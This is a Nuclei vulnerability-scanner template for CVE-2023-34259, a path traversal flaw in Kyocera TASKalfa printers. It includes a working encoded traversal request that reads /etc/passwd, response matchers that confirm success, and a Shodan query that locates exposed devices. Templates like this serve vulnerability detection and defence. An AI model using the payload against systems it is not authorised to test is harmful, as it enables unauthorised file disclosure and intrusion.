nuclei-templates/http/cves/2023/CVE-2023-34259.yaml

48 lines
1.7 KiB
YAML

id: CVE-2023-34259
info:
name: Kyocera TASKalfa printer - Path Traversal
author: gy741
severity: high
description: |
CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings.
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://sec-consult.com/vulnerability-lab/advisory/path-traversal-bypass-denial-of-service-in-kyocera-printer/
- https://www.kyoceradocumentsolutions.com/en/our-business/security/information/2023-07-14.html
- https://packetstormsecurity.com/files/173397/Kyocera-TASKalfa-4053ci-2VG_S000.002.561-Path-Traversal-Denial-Of-Service.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-34259
cwe-id: CWE-22
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-50306417
tags: packetstorm,cve,cve2023,kyocera,lfi,printer
http:
- method: GET
path:
- "{{BaseURL}}/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0"
- type: word
part: server
words:
- "KM-MFP"
- type: status
status:
- 200
# digest: 4a0a0047304502207001b4e51270d21cf80e87bc20269786d161b4186c0b526c59136b06a265f3fa022100c7538be325574a8701380170387ef5e2081e3b54dcdb09652cd389884c7576a6:922c64590222798bb761d5b6d8e72950